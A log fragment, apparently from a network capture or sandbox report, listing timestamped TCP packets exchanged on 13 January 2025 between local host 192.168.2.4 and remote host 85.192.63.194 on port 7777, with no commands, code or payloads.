                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561844110 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561873913 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561933041 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561968088 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561969042 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561969995 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561996937 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562030077 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562052011 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562063932 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562088966 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562352896 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562386990 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562408924 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562419891 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562453985 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562469959 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562941074 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562974930 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.562995911 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563008070 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563040972 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563064098 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563075066 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563128948 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563822985 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563851118 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.563934088 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.570904016 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.570933104 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.570981979 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571006060 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571013927 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571047068 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571060896 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571299076 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571352959 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571360111 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571393967 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571429968 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.571446896 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.618076086 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.652019024 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.652053118 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.652314901 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655272961 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655308008 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655375004 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655383110 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655389071 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655422926 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655450106 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655457020 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655510902 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655582905 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655615091 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655647039 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655667067 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655680895 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.655738115 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656004906 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656056881 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656097889 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656105042 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656126976 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656181097 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656411886 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656501055 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656533957 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656567097 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656599998 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.656627893 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657109976 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657143116 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657174110 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657176018 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657210112 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657222033 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657243013 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657275915 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657289982 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657309055 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657371998 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.657973051 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658004999 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658037901 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658054113 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658071041 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658104897 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658117056 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658138990 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.658193111 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665340900 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665375948 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665422916 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665425062 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665457010 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665512085 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665523052 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665555954 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665587902 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665601969 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665827990 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665882111 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665884972 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665915012 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665949106 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665965080 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.665982008 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.666035891 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.666287899 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.666321039 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.666353941 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.666367054 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.708889961 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.708935976 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.708971977 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.708971977 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.709016085 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.709016085 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.709052086 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.709089041 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.709091902 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.746042013 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.746093988 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.746129036 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749428034 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749478102 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749511957 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749543905 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749577045 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749598980 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749598980 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749608040 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749640942 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749667883 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749675989 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749691963 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749710083 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749742031 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749767065 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749775887 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749810934 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.749840975 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750159979 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750193119 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750215054 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750226021 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750257969 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750274897 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750291109 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750323057 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750339031 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750837088 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750869036 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750891924 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750902891 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750933886 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750953913 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750967026 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.750998974 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751017094 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751033068 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751068115 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751106024 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751751900 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751784086 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751806974 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751818895 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751851082 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751873970 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751883984 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751915932 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751935005 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751949072 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.751982927 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752070904 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752765894 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752796888 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752815962 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752830982 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752861023 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752876997 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752893925 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752924919 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752942085 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752959967 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.752991915 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753004074 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753515005 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753546953 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753561974 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753581047 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753612995 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753626108 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753647089 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753680944 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.753690958 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.755948067 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.755980015 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.755999088 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756031036 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756062984 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756094933 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756124973 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756175995 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756175995 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756413937 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756448030 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756464005 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756484985 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756515980 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756531954 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756547928 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756578922 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.756594896 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759260893 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759293079 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759325981 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759349108 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759380102 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759394884 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759430885 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759463072 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759478092 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759495020 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759526968 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759541035 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759558916 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759591103 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759603024 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759624004 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759651899 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759675980 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759685040 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759718895 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759737015 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759749889 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759783030 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.759793997 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799484015 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799531937 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799567938 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799601078 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799634933 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799668074 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799700975 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799732924 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799766064 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799779892 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799779892 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799781084 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799781084 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799799919 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.799880028 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836630106 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836675882 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836710930 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836745977 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836780071 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836947918 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836949110 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.836949110 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.839982033 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.840017080 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.840049982 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.840075970 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.840081930 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.840116024 CET77774973085.192.63.194192.168.2.4
